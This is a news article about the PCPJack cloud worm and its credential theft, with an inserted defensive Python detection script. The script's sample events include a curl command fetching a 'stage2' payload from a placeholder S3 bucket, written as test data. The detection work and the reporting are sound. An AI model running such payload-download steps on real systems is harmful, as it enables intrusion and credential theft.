PCPJack Worm Removes TeamPCP Malware While Stealing Cloud Credentials

Cybersecurity researchers have uncovered a new malware framework called PCPJack that targets cloud infrastructure, removes infections linked to the TeamPCP hacking group, and steals sensitive credentials from compromised systems. The malware campaign was identified by SentinelOne researchers, who described PCPJack as a worm-like framework focused on credential theft and cloud propagation.

According to the researchers, PCPJack appears to specifically hunt for traces of TeamPCP malware and removes associated tools, processes, and artifacts before deploying its own malicious payloads. Experts believe the campaign may be operated by a former TeamPCP member or someone highly familiar with the group’s infrastructure and tactics.

The malware primarily targets exposed cloud environments and vulnerable web applications, including Docker, Kubernetes, Redis, MongoDB, RayML, and various Linux-based systems. SentinelOne noted that PCPJack can move laterally across networks and spread itself using known software vulnerabilities in platforms such as Next.js, WordPress plugins, and CentOS Web Panel.

Researchers explained that infections begin with a Linux shell script that prepares the environment and downloads additional payloads from attacker-controlled AWS S3 infrastructure. The malware then creates a Python virtual environment and deploys several modules designed for credential harvesting, cloud scanning, lateral movement, encrypted command-and-control communication, and propagation across connected systems.
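The chain described above (shell script, download from S3, Python virtual environment) can be turned into a simple process-lineage detection. The following is an added example, not SentinelOne's detection logic or any PCPJack code; the process events and the S3 bucket host are constructed placeholders, and the record format (pid, ppid, comm, cmdline) is assumed to come from execve-style telemetry such as auditd or an EDR agent.

```python
import re

# Heuristics for the described chain: shell script -> S3 download -> venv creation.
S3_URL = re.compile(r"https?://[^\s'\"]*s3[.\-][^\s'\"]*amazonaws\.com", re.I)
VENV_CMD = re.compile(r"\bpython[\d.]*\s+-m\s+venv\b|\bvirtualenv\b")
SHELLS = {"sh", "bash", "dash", "zsh"}


def is_shell_script(ev):
    return ev["comm"] in SHELLS and ".sh" in ev["cmdline"]


def find_download_then_venv(events):
    """events: execve-style records (pid, ppid, comm, cmdline) in time order.
    Returns one finding per shell-script process that has BOTH an S3 download
    and a venv creation among its descendants (direct or via subprocesses)."""
    by_pid = {ev["pid"]: ev for ev in events}
    facts = {}  # script pid -> {"fetch": first fetch pid, "venv": first venv pid}

    def script_ancestor(ev):
        # Walk up the parent chain to the nearest shell-script process, if any.
        cur = ev
        while cur is not None:
            if is_shell_script(cur):
                return cur["pid"]
            cur = by_pid.get(cur["ppid"])
        return None

    for ev in events:
        if ev["comm"] in ("curl", "wget") and S3_URL.search(ev["cmdline"]):
            kind = "fetch"
        elif VENV_CMD.search(ev["cmdline"]):
            kind = "venv"
        else:
            continue
        root = script_ancestor(ev)
        if root is None:
            continue
        rec = facts.setdefault(root, {"fetch": None, "venv": None})
        if rec[kind] is None:
            rec[kind] = ev["pid"]

    return [{"script_pid": pid, "fetch_pid": r["fetch"], "venv_pid": r["venv"]}
            for pid, r in sorted(facts.items())
            if r["fetch"] is not None and r["venv"] is not None]


# Constructed sample events (not real telemetry); the bucket host is a placeholder.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "comm": "bash", "cmdline": "bash /tmp/setup.sh"},
    {"pid": 101, "ppid": 100, "comm": "curl",
     "cmdline": "curl -fsSL https://example-bucket.s3.amazonaws.com/stage2.tgz -o /tmp/s.tgz"},
    {"pid": 102, "ppid": 100, "comm": "python3", "cmdline": "python3 -m venv /tmp/.venv"},
    # Benign developer script: venv creation with no S3 fetch, must not alert.
    {"pid": 200, "ppid": 1, "comm": "bash", "cmdline": "bash /home/dev/build.sh"},
    {"pid": 201, "ppid": 200, "comm": "python3", "cmdline": "python3 -m venv .venv"},
]

if __name__ == "__main__":
    print(find_download_then_venv(SAMPLE_EVENTS))
```

The benign build script in the sample produces no finding because only the combination of both behaviours under one script is flagged; tune `S3_URL` to the storage hosts your environment legitimately uses to keep the rule's false-positive rate down.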

Unlike many cloud-focused malware campaigns, PCPJack does not deploy cryptocurrency miners. Instead, the framework appears focused on stealing credentials tied to financial services, enterprise software, messaging platforms, cloud accounts, and developer environments. Researchers warned that the stolen access could later be used for fraud, spam operations, extortion, or resale on underground markets.

One of the malware’s more unusual features is its use of Common Crawl parquet files to identify internet-facing targets more efficiently. Security researchers noted that this method allows attackers to locate valid and responsive hosts without relying on noisy mass-scanning techniques, making the activity harder to detect.

The discovery comes amid broader concerns surrounding TeamPCP, a threat group linked to several major supply chain attacks earlier in 2026. The group previously targeted GitHub Actions, Docker Hub, PyPI packages, developer tools, and CI/CD pipelines to steal secrets and compromise cloud-native environments.

Security experts are advising organizations to secure exposed cloud services, monitor unusual changes in container and Kubernetes environments, patch vulnerable applications, audit installed packages, and closely monitor credential usage patterns to reduce the risk of compromise.
